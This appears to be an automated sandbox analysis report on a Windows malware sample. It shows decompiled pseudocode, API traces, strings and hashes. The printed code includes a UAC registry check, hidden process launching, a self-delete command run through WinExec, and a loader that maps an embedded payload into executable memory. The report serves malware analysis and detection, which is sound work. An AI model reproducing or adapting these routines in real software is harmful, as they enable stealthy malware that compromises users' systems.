                                                                                                                                                      • API ID: DefaultExistsFilePathSystem
                                                                                                                                                      • String ID: -0.25$45.0.0$C:\hijack$exe$install$status=main_start$user01
                                                                                                                                                      • API String ID: 482051434-1656717437
                                                                                                                                                      • Opcode ID: 3ed2b26a57a2e0ec3b3ffba1c8676fbab2e5e79ae8907fbc825caa914dadcd8d
                                                                                                                                                      • Instruction ID: 76c3a66b6cadf2752fd619ea01efa0c867ff815aaebb18d2e7d5061645e6b307
                                                                                                                                                      • Opcode Fuzzy Hash: 3ed2b26a57a2e0ec3b3ffba1c8676fbab2e5e79ae8907fbc825caa914dadcd8d
                                                                                                                                                      • Instruction Fuzzy Hash: 0501F978D083189FD750FFA49C4A7DE77B2DF40254F900198FD0866143EB31B5909E62
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001DC00(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                      				struct _OSVERSIONINFOW _v284;
                                                                                                                                                      				char _v547;
                                                                                                                                                      				char _v548;
                                                                                                                                                      				char _v819;
                                                                                                                                                      				char _v820;
                                                                                                                                                      				char _v824;
                                                                                                                                                      				void* _t31;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      				void* _t41;
                                                                                                                                                      				void* _t49;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      				void* _t51;
                                                                                                                                                      				void* _t52;
                                                                                                                                                      				void* _t53;
                                                                                                                                                      				void* _t57;
                                                                                                                                                      				void* _t69;
                                                                                                                                                      				void* _t70;
                                                                                                                                                      				void* _t71;
                                                                                                                                                      				void* _t74;
                                                                                                                                                      				void* _t75;
                                                                                                                                                      				void* _t77;
                                                                                                                                                      
                                                                                                                                                      				_t69 = __esi;
                                                                                                                                                      				_t68 = __edi;
                                                                                                                                                      				_t57 = __ebx;
                                                                                                                                                      				if(_a4 == 0) {
                                                                                                                                                      					return _t31;
                                                                                                                                                      				}
                                                                                                                                                      				_v820 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v819, 0, 0x103);
                                                                                                                                                      				_v548 = 0;
                                                                                                                                                      				_t58 =  &_v547;
                                                                                                                                                      				E1000CF20(_t68,  &_v547, 0, 0x103);
                                                                                                                                                      				_t65 =  &(_v284.dwMajorVersion);
                                                                                                                                                      				E1000CF20(_t68,  &(_v284.dwMajorVersion), 0, 0x110);
                                                                                                                                                      				_t74 = _t71 + 0x24;
                                                                                                                                                      				_v284.dwOSVersionInfoSize = 0x114;
                                                                                                                                                      				GetVersionExW( &_v284);
                                                                                                                                                      				if(_v284.dwMajorVersion != 6 || _v284.dwMinorVersion != 2) {
                                                                                                                                                      					L7:
                                                                                                                                                      					_t38 = E1001D7E0(_t68,  &_v548); // executed
                                                                                                                                                      					_t75 = _t74 + 4;
                                                                                                                                                      					__eflags = _t38;
                                                                                                                                                      					if(_t38 != 0) {
                                                                                                                                                      						L11:
                                                                                                                                                      						E1001D2D0(_t58,  &_v548);
                                                                                                                                                      						_t65 =  &_v820;
                                                                                                                                                      						_t41 = E1001CCF0( &_v820, 0x104,  &_v824);
                                                                                                                                                      						_t77 = _t75 + 0x10;
                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                      						if(_t41 >= 0) {
                                                                                                                                                      							_t65 = 0x104 - _v824;
                                                                                                                                                      							__eflags = 0x104;
                                                                                                                                                      							E1001CC50( &_v548, 0x104 - _v824, _t70 + _v824 - 0x330);
                                                                                                                                                      							_t77 = _t77 + 0xc;
                                                                                                                                                      						}
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      					_t49 = E1001D560(_t68,  &_v548); // executed
                                                                                                                                                      					_t75 = _t75 + 4;
                                                                                                                                                      					__eflags = _t49;
                                                                                                                                                      					if(_t49 != 0) {
                                                                                                                                                      						goto L11;
                                                                                                                                                      					}
                                                                                                                                                      					_t58 =  &_v548;
                                                                                                                                                      					_t50 = E1001DA70(_t68,  &_v548); // executed
                                                                                                                                                      					_t75 = _t75 + 4;
                                                                                                                                                      					__eflags = _t50;
                                                                                                                                                      					if(_t50 != 0) {
                                                                                                                                                      						goto L11;
                                                                                                                                                      					}
                                                                                                                                                      					_t65 =  &_v548;
                                                                                                                                                      					_t51 = E1001D370(_t57, _t68, _t69,  &_v548);
                                                                                                                                                      					_t77 = _t75 + 4;
                                                                                                                                                      					__eflags = _t51;
                                                                                                                                                      					if(_t51 == 0) {
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      					goto L11;
                                                                                                                                                      				} else {
                                                                                                                                                      					_t52 = E1001D240(); // executed
                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                      						goto L7;
                                                                                                                                                      					}
                                                                                                                                                      					_t53 = E1001DA70(_t68,  &_v548);
                                                                                                                                                      					_t77 = _t74 + 4;
                                                                                                                                                      					_t84 = _t53;
                                                                                                                                                      					if(_t53 != 0) {
                                                                                                                                                      						_t65 =  &_v548;
                                                                                                                                                      						E1001D2D0( &_v548,  &_v548);
                                                                                                                                                      						E1001D320(_t84,  &_v820,  &_v548);
                                                                                                                                                      						_t77 = _t77 + 0xc;
                                                                                                                                                      					}
                                                                                                                                                      					L13:
                                                                                                                                                      					if(_v820 == 0) {
                                                                                                                                                      						_t65 =  &_v820;
                                                                                                                                                      						E1001CFA0("Mid2Failed", 0x104,  &_v820);
                                                                                                                                                      						_t77 = _t77 + 0xc;
                                                                                                                                                      					}
                                                                                                                                                      					return E1000D8A3(_t65, _a4, 0x104,  &_v820);
                                                                                                                                                      				}
                                                                                                                                                      			}
























                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dc8c
                                                                                                                                                      0x1001dc8c
                                                                                                                                                      0x1001dc93
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001dc9c
                                                                                                                                                      0x1001dca1
                                                                                                                                                      0x1001dca4
                                                                                                                                                      0x1001dca6
                                                                                                                                                      0x1001dca8
                                                                                                                                                      0x1001dcaf
                                                                                                                                                      0x1001dcc5
                                                                                                                                                      0x1001dcca
                                                                                                                                                      0x1001dcca
                                                                                                                                                      0x1001dd75
                                                                                                                                                      0x1001dd7e
                                                                                                                                                      0x1001dd80
                                                                                                                                                      0x1001dd91
                                                                                                                                                      0x1001dd96
                                                                                                                                                      0x1001dd96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ddae

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC28
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC45
                                                                                                                                                      • _memset.LIBCMT ref: 1001DC5B
                                                                                                                                                      • GetVersionExW.KERNEL32(00000114), ref: 1001DC74
                                                                                                                                                      • _strcpy_s.LIBCMT ref: 1001DDA9
                                                                                                                                                        • Part of subcall function 1001D240: RegOpenKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,00020019,00000000), ref: 1001D27E
                                                                                                                                                        • Part of subcall function 1001D240: RegQueryValueExW.KERNELBASE(00000000,EnableLUA,00000000,00000004,00000000,00000004), ref: 1001D29F
                                                                                                                                                        • Part of subcall function 1001D240: RegCloseKey.ADVAPI32(00000000), ref: 1001D2B9
                                                                                                                                                        • Part of subcall function 1001DA70: wsprintfW.USER32 ref: 1001DABC
                                                                                                                                                        • Part of subcall function 1001DA70: CreateFileW.KERNELBASE(?,00000000,00000003,00000000,00000003,00000000,00000000), ref: 1001DAD8
                                                                                                                                                        • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB21
                                                                                                                                                        • Part of subcall function 1001DA70: DeviceIoControl.KERNELBASE(000000FF,002D1400,?,0000000C,?,00002710,?,00000000), ref: 1001DB50
                                                                                                                                                        • Part of subcall function 1001DA70: _memset.LIBCMT ref: 1001DB68
                                                                                                                                                        • Part of subcall function 1001DA70: FindCloseChangeNotification.KERNELBASE(000000FF), ref: 1001DBB4
                                                                                                                                                        • Part of subcall function 1001D2D0: _strlen.LIBCMT ref: 1001D2DE
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$Close$ChangeControlCreateDeviceFileFindNotificationOpenQueryValueVersion_strcpy_s_strlenwsprintf
                                                                                                                                                      • String ID: Mid2Failed
                                                                                                                                                      • API String ID: 3782552391-1001836097
                                                                                                                                                      • Opcode ID: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                      • Instruction ID: aa707a60008127caf2ce8d05e14bba9426138a7f06fddb79af8b759b423a3348
                                                                                                                                                      • Opcode Fuzzy Hash: 434b6e32a3c6e1f2745455de6dca3a5a8c35b3b9910fd8773f32aa561de938fc
                                                                                                                                                      • Instruction Fuzzy Hash: 224184B5C0021967EB14F7A0AC86FEA737DEB14744F4404A9EA0899142F771FBC8CB92
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 67%
                                                                                                                                                      			E1001FEA0(void* __ebx, void* __edi, void* __esi, void* __eflags, char _a4) {
                                                                                                                                                      				char _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				char _v44;
                                                                                                                                                      				char _v311;
                                                                                                                                                      				char _v312;
                                                                                                                                                      				char _v575;
                                                                                                                                                      				char _v576;
                                                                                                                                                      				void* _t30;
                                                                                                                                                      				intOrPtr _t43;
                                                                                                                                                      				void* _t50;
                                                                                                                                                      
                                                                                                                                                      				_t50 = __eflags;
                                                                                                                                                      				_t41 = __edi;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022AF1);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t43;
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v576 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v575, 0, 0x103);
                                                                                                                                                      				_v312 = 0;
                                                                                                                                                      				E1000CF20(_t41,  &_v311, 0, 0x103);
                                                                                                                                                      				E1001A600(__ebx, _t41, __esi, _t50,  &_v44); // executed
                                                                                                                                                      				GetTempPathA(0x104,  &_v576);
                                                                                                                                                      				_push(E100011E0( &_a4));
                                                                                                                                                      				_push("0011");
                                                                                                                                                      				_push(E100011E0( &_v44));
                                                                                                                                                      				E1000CC93(_t41,  &_v312, "%s%s %s %s",  &_v576);
                                                                                                                                                      				E1001A1D0(_t50,  &_v312); // executed
                                                                                                                                                      				E100011A0( &_v44);
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				_t30 = E100011A0( &_a4);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _t30;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001FEDA
                                                                                                                                                      • _memset.LIBCMT ref: 1001FEF7
                                                                                                                                                        • Part of subcall function 1001A600: _memset.LIBCMT ref: 1001A651
                                                                                                                                                        • Part of subcall function 1001A600: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A600: _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                      • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FF17
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001FF47
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                        • Part of subcall function 1001A1D0: _memset.LIBCMT ref: 1001A209
                                                                                                                                                        • Part of subcall function 1001A1D0: CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                        • Part of subcall function 1001A1D0: CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$CloseHandle_sprintf$CreateFileModuleNamePathProcessTemp
                                                                                                                                                      • String ID: %s%s %s %s$0011
                                                                                                                                                      • API String ID: 3552933064-2132516514
                                                                                                                                                      • Opcode ID: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
                                                                                                                                                      • Instruction ID: 6384a0b866657e4047376afeeb64c65eb3b3c0e3c567da3335d1d9c995957fc0
                                                                                                                                                      • Opcode Fuzzy Hash: aa753cf6024a5312e58eede15facf5b7fe5e90c3d39c81259a110b7468d0f49f
                                                                                                                                                      • Instruction Fuzzy Hash: 7911B6B6C00248ABE714EB90DC96FDD7778EB04750F4041A4FA19661C1EB747B48CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A1D0(void* __eflags, CHAR* _a4) {
                                                                                                                                                      				struct _PROCESS_INFORMATION _v20;
                                                                                                                                                      				CHAR* _v24;
                                                                                                                                                      				struct _STARTUPINFOA _v100;
                                                                                                                                                      				int _t18;
                                                                                                                                                      				void* _t27;
                                                                                                                                                      
                                                                                                                                                      				_v24 = 0;
                                                                                                                                                      				E1000CF20(_t27,  &_v100, 0, 0x44);
                                                                                                                                                      				_v100.cb = 0x44;
                                                                                                                                                      				_v100.dwFlags = 1;
                                                                                                                                                      				_v100.wShowWindow = 0;
                                                                                                                                                      				E1000CF20(_t27,  &_v20, 0, 0x10);
                                                                                                                                                      				_t18 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0,  &_v100,  &_v20); // executed
                                                                                                                                                      				if(_t18 != 0) {
                                                                                                                                                      					CloseHandle(_v20.hThread);
                                                                                                                                                      					CloseHandle(_v20);
                                                                                                                                                      					_v24 = 1;
                                                                                                                                                      				}
                                                                                                                                                      				return _v24;
                                                                                                                                                      			}









                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A1E5
                                                                                                                                                      • _memset.LIBCMT ref: 1001A209
                                                                                                                                                      • CreateProcessA.KERNELBASE(00000000,1001FD2F,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 1001A22B
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001A239
                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 1001A243
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseHandle_memset$CreateProcess
                                                                                                                                                      • String ID: D
                                                                                                                                                      • API String ID: 1151464618-2746444292
                                                                                                                                                      • Opcode ID: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                      • Instruction ID: ef4eb28381490467371c772dbf4cc47cae63647d7d2172f01b5caa4c4fe940a9
                                                                                                                                                      • Opcode Fuzzy Hash: 7eeb0e77ddf9764189b8f2e5d2f15a657f104191f59f7ae2d7ae820ce566c070
                                                                                                                                                      • Instruction Fuzzy Hash: 8601E1B590031DABEB00DBD0DC8AFEE77B9FB44704F144518FA04AB285D7B5A904CBA5
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001A260() {
                                                                                                                                                      				char _v267;
                                                                                                                                                      				char _v268;
                                                                                                                                                      				char _v531;
                                                                                                                                                      				char _v532;
                                                                                                                                                      				int _t15;
                                                                                                                                                      				void* _t20;
                                                                                                                                                      
                                                                                                                                                      				_v532 = 0;
                                                                                                                                                      				E1000CF20(_t20,  &_v531, 0, 0x103);
                                                                                                                                                      				_v268 = 0;
                                                                                                                                                      				E1000CF20(_t20,  &_v267, 0, 0x103);
                                                                                                                                                      				GetModuleFileNameA(0,  &_v532, 0x104);
                                                                                                                                                      				E1000CC93(_t20,  &_v268, "cmd /c ping 127.0.0.1 -n 3 & del \"%s\"",  &_v532);
                                                                                                                                                      				_t15 = WinExec( &_v268, 0); // executed
                                                                                                                                                      				return _t15;
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • cmd /c ping 127.0.0.1 -n 3 & del "%s", xrefs: 1001A2BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset$ExecFileModuleName_sprintf
                                                                                                                                                      • String ID: cmd /c ping 127.0.0.1 -n 3 & del "%s"
                                                                                                                                                      • API String ID: 2874319085-10483710
                                                                                                                                                      • Opcode ID: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                      • Instruction ID: 1002a94702f99074cc5a7191c0e86848812ee27a6531f1c6c96f6cd2bf050705
                                                                                                                                                      • Opcode Fuzzy Hash: e80dcffb5be6524fb62fa3981304e452ddcdcc2dec408acc4a89c3725432b8f1
                                                                                                                                                      • Instruction Fuzzy Hash: 6EF0AF7988431C6AE720D760DC8AFE9772CAB20700F0005D4F6986A0C1EAF067C88BA2
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E00404C40() {
                                                                                                                                                      				intOrPtr _t75;
                                                                                                                                                      				void* _t99;
                                                                                                                                                      
                                                                                                                                                      				 *((intOrPtr*)(_t99 - 0x28))(0, _t99 - 0x138);
                                                                                                                                                      				 *(_t99 - 0x1a0) = CreateFileA(_t99 - 0x138, 0x80000000, 3, 0, 3, 0x80, 0);
                                                                                                                                                      				 *((intOrPtr*)(_t99 - 0x1c8)) =  *((intOrPtr*)(_t99 - 0x18c))();
                                                                                                                                                      				 *(_t99 - 0x30) =  *((intOrPtr*)(_t99 - 0x1d8))( *(_t99 - 0x1a0), 0);
                                                                                                                                                      				 *(_t99 - 0x188) = VirtualAlloc(0,  *(_t99 - 0x30), 0x3000, 4);
                                                                                                                                                      				E00405369( *(_t99 - 0x30),  *(_t99 - 0x188), 0,  *(_t99 - 0x30));
                                                                                                                                                      				ReadFile( *(_t99 - 0x1a0),  *(_t99 - 0x188),  *(_t99 - 0x30), _t99 - 0x1f4, 0);
                                                                                                                                                      				 *((intOrPtr*)(_t99 - 0x1c8)) =  *((intOrPtr*)(_t99 - 0x18c))();
                                                                                                                                                      				FindCloseChangeNotification( *(_t99 - 0x1a0));
                                                                                                                                                      				E004053A9(_t99 - 0x184,  *(_t99 - 0x188) + 0x45, 4);
                                                                                                                                                      				 *(_t99 - 0x19c) =  *(_t99 - 0x30) -  *((intOrPtr*)(_t99 - 0x184));
                                                                                                                                                      				 *((intOrPtr*)(_t99 - 0x1f0)) = VirtualAlloc(0,  *(_t99 - 0x19c), 0x3000, 0x40);
                                                                                                                                                      				E004053A9( *((intOrPtr*)(_t99 - 0x1f0)),  *(_t99 - 0x188) +  *((intOrPtr*)(_t99 - 0x184)),  *(_t99 - 0x19c));
                                                                                                                                                      				E00405529( *((intOrPtr*)(_t99 - 0x184)), _t99 - 0x178, 0xa);
                                                                                                                                                      				 *((intOrPtr*)(_t99 - 0x1ac)) = E00405569( *((intOrPtr*)(_t99 - 0x184)), _t99 - 0x178);
                                                                                                                                                      				_t75 = E004050D9( *((intOrPtr*)(_t99 - 0x1f0)),  *(_t99 - 0x19c), _t99 - 0x178,  *((intOrPtr*)(_t99 - 0x1ac)),  *((intOrPtr*)(_t99 - 0x1dc)),  *((intOrPtr*)(_t99 - 0x180)),  *((intOrPtr*)(_t99 - 0x2c)),  *((intOrPtr*)(_t99 - 0x148))); // executed
                                                                                                                                                      				 *((intOrPtr*)(_t99 - 0x1b0)) = _t75;
                                                                                                                                                      				return  *((intOrPtr*)(_t99 - 0x1a4))(0);
                                                                                                                                                      			}






                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00404C65
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 00404C9C
                                                                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00404CD5
                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?), ref: 00404CEE
                                                                                                                                                      • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00404D2B
                                                                                                                                                      • RtlExitUserProcess.NTDLL(00000000,?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00404DC6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AllocFileVirtual$ChangeCloseCreateExitFindNotificationProcessReadUser
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4217122820-0
                                                                                                                                                      • Opcode ID: a6a619df2eab66db07fc3d4eeceb2a7f00c328dc89a8d70033a52e42d2ef16f1
                                                                                                                                                      • Instruction ID: 286b678a649b461aa87654d1fb9e4a3dc2712c27ebad769fdf01e4c5803113b1
                                                                                                                                                      • Opcode Fuzzy Hash: a6a619df2eab66db07fc3d4eeceb2a7f00c328dc89a8d70033a52e42d2ef16f1
                                                                                                                                                      • Instruction Fuzzy Hash: 1941B9B1E40228AFEB64DBA4CC55FEEB779AB49700F0081D9F60DB6280DA755E80CF55
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                      			E1001A600(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
                                                                                                                                                      				struct HINSTANCE__* _v8;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                      				char _v52;
                                                                                                                                                      				char _v53;
                                                                                                                                                      				short _v55;
                                                                                                                                                      				char _v59;
                                                                                                                                                      				char _v63;
                                                                                                                                                      				char _v67;
                                                                                                                                                      				char _v71;
                                                                                                                                                      				char _v72;
                                                                                                                                                      				char _v335;
                                                                                                                                                      				char _v336;
                                                                                                                                                      				signed int _v340;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				intOrPtr _t40;
                                                                                                                                                      				void* _t45;
                                                                                                                                                      				intOrPtr _t73;
                                                                                                                                                      
                                                                                                                                                      				_t80 = __eflags;
                                                                                                                                                      				_t71 = __edi;
                                                                                                                                                      				_push(0xffffffff);
                                                                                                                                                      				_push(E10022A9E);
                                                                                                                                                      				_push( *[fs:0x0]);
                                                                                                                                                      				 *[fs:0x0] = _t73;
                                                                                                                                                      				_v340 = 0;
                                                                                                                                                      				E10001160( &_v52, __eflags, 0x10024ca1);
                                                                                                                                                      				_v8 = 0;
                                                                                                                                                      				_v336 = 0;
                                                                                                                                                      				E1000CF20(__edi,  &_v335, 0, 0x103);
                                                                                                                                                      				GetModuleFileNameA(0,  &_v336, 0x104);
                                                                                                                                                      				_t40 = E1001A170( &_v336); // executed
                                                                                                                                                      				_v24 = _t40;
                                                                                                                                                      				_v72 = 0;
                                                                                                                                                      				_v71 = 0;
                                                                                                                                                      				_v67 = 0;
                                                                                                                                                      				_v63 = 0;
                                                                                                                                                      				_v59 = 0;
                                                                                                                                                      				_v55 = 0;
                                                                                                                                                      				_v53 = 0;
                                                                                                                                                      				E1000CC93(_t71,  &_v72, "%d", _v24);
                                                                                                                                                      				_v20 = E1001A480(__ebx,  &_v72, _t71, __esi, _t80,  &_v72);
                                                                                                                                                      				_t81 = _v20;
                                                                                                                                                      				if(_v20 != 0) {
                                                                                                                                                      					E10001A90( &_v52, _t81, _v20);
                                                                                                                                                      					E10001A90( &_v52, _t81, ".exe");
                                                                                                                                                      					_push(_v20);
                                                                                                                                                      					E1000CA30(__ebx, _t71, __esi, _t81);
                                                                                                                                                      				}
                                                                                                                                                      				_t45 = E10001200( &_v52);
                                                                                                                                                      				_t82 = _t45;
                                                                                                                                                      				if(_t45 == 0) {
                                                                                                                                                      					E10001A90( &_v52, _t82, "baidu.exe");
                                                                                                                                                      				}
                                                                                                                                                      				E10001110(_a4, _t82,  &_v52);
                                                                                                                                                      				_v340 = _v340 | 0x00000001;
                                                                                                                                                      				_v8 = 0xffffffff;
                                                                                                                                                      				E100011A0( &_v52);
                                                                                                                                                      				 *[fs:0x0] = _v16;
                                                                                                                                                      				return _a4;
                                                                                                                                                      			}























                                                                                                                                                      APIs
                                                                                                                                                      • _memset.LIBCMT ref: 1001A651
                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A667
                                                                                                                                                        • Part of subcall function 1001A170: FindFirstFileA.KERNELBASE(1001A679,?), ref: 1001A18E
                                                                                                                                                        • Part of subcall function 1001A170: FindClose.KERNELBASE(000000FF), ref: 1001A1B6
                                                                                                                                                      • _sprintf.LIBCMT ref: 1001A6A5
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4BB
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A4CE
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4DA
                                                                                                                                                        • Part of subcall function 1001A480: _strlen.LIBCMT ref: 1001A4FD
                                                                                                                                                        • Part of subcall function 1001A480: _sprintf.LIBCMT ref: 1001A56C
                                                                                                                                                        • Part of subcall function 1001A480: _memset.LIBCMT ref: 1001A5B6
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_find_block.LIBCMT ref: 1000CA59
                                                                                                                                                        • Part of subcall function 1000CA30: ___sbh_free_block.LIBCMT ref: 1000CA68
                                                                                                                                                        • Part of subcall function 1000CA30: HeapFree.KERNEL32(00000000,?,103301C0,Function_0000CA30,1001322F,00000000), ref: 1000CA98
                                                                                                                                                        • Part of subcall function 1000CA30: GetLastError.KERNEL32(?,?,?,?,?,?,?,103301C0), ref: 1000CAA9
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
